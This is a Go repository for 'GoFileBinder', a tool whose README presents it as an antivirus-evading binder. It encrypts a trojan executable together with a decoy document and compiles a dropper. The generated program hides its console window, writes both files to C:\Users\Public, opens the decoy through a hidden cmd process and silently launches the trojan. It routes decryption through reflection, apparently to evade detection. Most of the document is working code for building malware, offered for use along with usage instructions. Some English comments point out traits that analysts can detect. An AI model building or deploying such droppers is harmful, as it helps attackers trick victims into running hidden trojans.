├── GoFileBinder.go
├── README.md
└── help.txt


/GoFileBinder.go:
--------------------------------------------------------------------------------
// GoFileBinder is a command-line builder. It reads two input files named on
// the command line, AES-encrypts both under one generated key, embeds the
// results in a generated Go source file and compiles that file with
// `go build`. An optional third argument supplies a .syso resource file.
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io/ioutil"
	"log"
	"math/rand"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
	"time"
)

var (
	// logo is the banner printed at start-up.
	logo = `
\__ | | | |__ _____|__|_ _ __ ____ |__|
/ | | | | \ / ___/ \ \/ \/ // __ \| |
\____ | | Y \\___ \| |\ /\ ___/| |
/ ______|___|___| /____ >__| \/\_/ \___ >__|
\/ \/ \/ \/
`
	// tvb is an author/channel notice printed after the banner.
	tvb = "这是我的频道欢迎投稿学习:https://space.bilibili.com/353948151 "

	// tishi is the usage text shown when the argument count is wrong.
	tishi = `
命令参数如: main.exe ma.exe xxx.doc
main.exe ma.exe xxx.doc ico.syso
`
)

// RandStr returns a string of `length` characters drawn from A-Z.
//
// It uses math/rand, re-seeded from the wall clock on every call, so the
// output is not cryptographically random. Note that the local variable
// `bytes` shadows the imported bytes package inside this function.
func RandStr(length int) string {
	str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	bytes := []byte(str)
	result := []byte{}
	rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
	for i := 0; i < length; i++ {
		result = append(result, bytes[rand.Intn(len(bytes))])
	}
	return string(result)
}

// main is the builder entry point.
//
// Arguments: os.Args[1] and os.Args[2] are the two files to embed;
// os.Args[3], if present, must end in ".syso". Any other argument count
// prints the usage text and exits.
func main() {
	fmt.Println(logo)
	fmt.Println(tvb)

	if len(os.Args) != 3 && len(os.Args) != 4{
		fmt.Println(tishi)
		return
	}
	mumafile := os.Args[1]
	docfile := os.Args[2]
	// One 16-character key (AES-128) is used for both files.
	key := RandStr(16)

	// Read errors are discarded here, so an unreadable path is processed as
	// empty input rather than reported.
	info, _ := ioutil.ReadFile(mumafile)
	var mumafileStr string = string(info[:])
	AesmumafileStr := AesEncrypt(mumafileStr, key)

	infodoc, _ := ioutil.ReadFile(docfile)
	var docfileStr string = string(infodoc[:])
	AesdocfileStr := AesEncrypt(docfileStr, key)
	// SourceCode is the complete Go source of the program this tool builds.
	// The six %s verbs receive, in order: the key, the first file's name, the
	// second file's name (twice) and the two base64 ciphertexts. The names
	// are inserted exactly as given on the command line.
	//
	// Behaviour of the generated program, as written in the template below
	// (these are the points an analyst or detection rule can key on):
	//   - it hides its console window through github.com/lxn/win;
	//   - it decrypts both blobs in package-level variable initialisers,
	//     using the key stored in the variable jian;
	//   - it writes the second file to C:\Users\Public\<name> and passes
	//     that path to a cmd process started with HideWindow set;
	//   - it writes the first file to C:\Users\Public\<name> and starts it
	//     when os.Stat reports that the file exists;
	//   - the decrypt and unpad helpers are invoked through reflect
	//     (str_func) rather than called directly.
	// The key sits in the generated binary next to the ciphertext and also
	// supplies the IV, so both embedded files can be recovered from a sample
	// statically, without executing it.
	SourceCode := fmt.Sprintf(`package main
import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"os"
	"os/exec"
	"reflect"
	"strings"
	"syscall"
	"github.com/lxn/win"
)

var (
	jian = "%s"
	mumawenjianname = "%s"
	docwenjianname = "%s"
	docwenjiannames = "%s"
	docwenjian = "%s"

	numawenjian = "%s"
	dstdawenjian = "ffff.DAT"
	selwenjian, _ = os.Executable()
	ddocwenjian = str_func(aesjiami,docwenjian, jian)[0].String()

	dmumawenjian = str_func(aesjiami,numawenjian, jian)[0].String()
)

func main() {
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
	a,_ := os.Getwd()
	b := os.Args[0]
	c := strings.Replace(b,a,"",-1)
	dstdawenjian = c

	panfu := selwenjian[0:2]
	if !strings.Contains(selwenjian, "C:") {

		dstdawenjian = panfu + "\\ffff.DAT"
	} else {
		dstdawenjian = panfu + dstdawenjian
	}

	//os.Rename(selwenjian, dstdawenjian)


	f2, _ := os.Create("C:\\Users\\Public\\" + docwenjianname)
	_, _ = f2.Write([]byte(ddocwenjian))
	f2.Close()


	cmd := exec.Command("cmd", " /c ","C:\\Users\\Public\\"+docwenjiannames)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	//cmd2.Stdout = os.Stdout
	_ = cmd.Start()
	var dstFilecc = "C:\\Users\\Public\\" + mumawenjianname
	f, _ := os.Create(dstFilecc)
	_, _ = f.Write([]byte(dmumawenjian))
	f.Close()


	_, err := os.Stat(dstFilecc)

	if err == nil {

		cmda := exec.Command(dstFilecc)
		_ = cmda.Start()

	}


}

func Pdaing(org []byte) []byte {
	length := len(org)
	unpadding := int(org[length-1])
	return org[:(length - unpadding)]
}
func aesjiami(can1 string, key string) string {
	kuashuzu, _ := base64.StdEncoding.DecodeString(can1)
	k := []byte(key)
	blo, _ := aes.NewCipher(k)
	blodaxiao := blo.BlockSize()
	blomoshi := cipher.NewCBCDecrypter(blo, k[:blodaxiao])
	org := make([]byte, len(kuashuzu))
	blomoshi.CryptBlocks(org, kuashuzu)
	org = str_func(Pdaing,org)[0].Bytes()
	return string(org)
}

func str_func(hanshu interface{}, canshu ...interface{}) []reflect.Value {
	//将函数包装为反射值对象
	funcValue := reflect.ValueOf(hanshu)
	//构造函数参数
	paramList := []reflect.Value{}
	for i := 0; i < len(canshu); i++ {
		paramList = append(paramList, reflect.ValueOf(canshu[i]))
	}
	//调用函数
	jieguo := funcValue.Call(paramList)
	//返回结果
	return jieguo
}
`, key, mumafile, docfile, docfile, AesdocfileStr, AesmumafileStr)

	// lujing is the output directory prefix (relative to the working
	// directory), comm is the build command written to the batch file, and
	// lujing2 is the absolute Windows path used to launch that batch file.
	lujing := ""
	comm := "go build main.go"
	lujing2 := ""

	// Four-argument form: build inside ./main so that `go build` picks up the
	// .syso resource placed beside main.go.
	if len(os.Args) == 4 {
		os.Mkdir("./main", os.ModePerm)
		lujing = "./main/"
		lj, _ := os.Getwd()
		lujing2 = lj+"\\main\\"
		comm = "cd "+ lujing2 + " && go build"
		if strings.HasSuffix(os.Args[3],".syso") {
			nr,err := ioutil.ReadFile(os.Args[3])
			if err != nil {
				return
			}
			f, _ := os.Create(lujing + "ico.syso")
			_, _ = f.Write(nr)
			f.Close()
			exitfile(lujing + "ico.syso")
			time.Sleep(time.Duration(1) * time.Second)
		}else {
			// A third argument without the .syso suffix ends the run silently.
			return
		}
	}

	// Write the generated source, then block until it is visible on disk.
	f, _ := os.Create(lujing + "main.go")
	_, _ = f.Write([]byte(SourceCode))
	f.Close()
	exitfile(lujing +"main.go")
	time.Sleep(time.Duration(1) * time.Second)

	// The build runs through a one-line batch file rather than a direct
	// exec of the go tool.
	batfile, _ := os.Create(lujing +"Yihsiwei.bat")

	_, _ = batfile.Write([]byte(comm))
	batfile.Close()
	exitfile(lujing +"Yihsiwei.bat")
	time.Sleep(time.Duration(1) * time.Second)
	// Start is not followed by Wait and its error is dropped; completion is
	// inferred from main.exe appearing on disk.
	cmd := exec.Command(lujing2 +"Yihsiwei.bat")
	cmd.Start()

	exitfile(lujing +"main.exe")
	// Intermediate files are removed once main.exe exists. "tubiao.syso" is
	// not a name created anywhere above; the resource copy written in the
	// four-argument form is "ico.syso", which this cleanup does not touch.
	os.RemoveAll(lujing +"main.go")
	os.RemoveAll(lujing +"Yihsiwei.bat")
	os.RemoveAll(lujing +"tubiao.syso")

}

// exitfile blocks until filename exists, polling once per second and printing
// the name on every iteration. There is no timeout.
//
// The path checked is GetCurrentDirectory() + "/" + filename, i.e. relative to
// the directory of os.Args[0].
// NOTE(review): main creates these files relative to the working directory,
// so this loop appears to terminate only when the tool is run from its own
// directory, which matches the README's instruction to keep the executable
// in a folder of its own.
func exitfile(filename string) {
	for {
		fmt.Println(filename)
		time.Sleep(time.Duration(1) * time.Second)
		_, err := os.Stat(GetCurrentDirectory() + "/" + filename)
		//fmt.Println(err)
		if err == nil {
			break
		}
	}
}

// GetCurrentDirectory returns the absolute directory of os.Args[0] with
// backslashes replaced by forward slashes. Despite the name, this is not the
// process working directory. It terminates the program via log.Fatal if the
// path cannot be made absolute.
func GetCurrentDirectory() string {
	dir, err := filepath.Abs(filepath.Dir(os.Args[0]))
	if err != nil {
		log.Fatal(err)
	}

	return strings.Replace(dir, "\\", "/", -1)
}

// PKCS7Padding appends PKCS#7 padding so the result length is a multiple of
// blocksize. Between 1 and blocksize bytes are always added, each holding the
// pad length. The parameter is named ciphertext but receives the plaintext at
// its only call site in this file. Because it uses append, the returned slice
// may share the argument's backing array.
func PKCS7Padding(ciphertext []byte, blocksize int) []byte {
	padding := blocksize - len(ciphertext)%blocksize
	padtext := bytes.Repeat([]byte{byte(padding)}, padding)
	return append(ciphertext, padtext...)
}

// AesEncrypt encrypts orig with AES in CBC mode under key and returns the
// ciphertext base64-encoded (standard alphabet).
//
// The IV is the first block-size bytes of the key itself, so it is fixed per
// key and never transmitted separately; no integrity check is applied. The
// aes.NewCipher error is discarded, so a key whose length is not a valid AES
// key size leaves block nil and the BlockSize call panics. main always passes
// a 16-byte key.
func AesEncrypt(orig string, key string) string {
	origData := []byte(orig)
	k := []byte(key)
	block, _ := aes.NewCipher(k)
	blockSize := block.BlockSize()
	origData = PKCS7Padding(origData, blockSize)
	blockMode := cipher.NewCBCEncrypter(block, k[:blockSize])
	cryted := make([]byte, len(origData))
	blockMode.CryptBlocks(cryted, origData)
	return base64.StdEncoding.EncodeToString(cryted)
}



--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# GoFileBinder

golang免杀捆绑器 捆绑器免杀效果会持续更新下去
使用以下命令进行捆绑器编译
`go build GoFileBinder.go`

使用以下命令生成捆绑文件(注:GoFileBinder.exe单独放入一个文件夹中)
`GoFileBinder.exe 木马.exe xxx.txt`

可以在我的频道中看到详细使用哦
`https://space.bilibili.com/353948151`
视频中提到的key现在已经不用手动了

非常感谢嘟嘟提出项目bug问题以及优化方案



### 修改:

* 修改捆绑的程序执行后不会删除
* 加入ico图标的exe生成
* 取消-ldflags="-H windowsgui"隐藏黑窗口,改用代码实现,增强免杀效果

go get github.com/lxn/win

GoFileBinder.exe 木马.exe 捆绑文件

GoFileBinder.exe 木马.exe 捆绑文件 syso文件



syso文件生成:

​ https://wanghaiqing.com/mobile/article/b92edef6-61bc-431b-af41-b813bc6a5e8c/

--------------------------------------------------------------------------------
/help.txt:
--------------------------------------------------------------------------------
go get github.com/lxn/win
go build GoFileBinder.go
GoFileBinder.exe 木马.exe 捆绑文件
GoFileBinder.exe 木马.exe 捆绑文件 ico图标文件
--------------------------------------------------------------------------------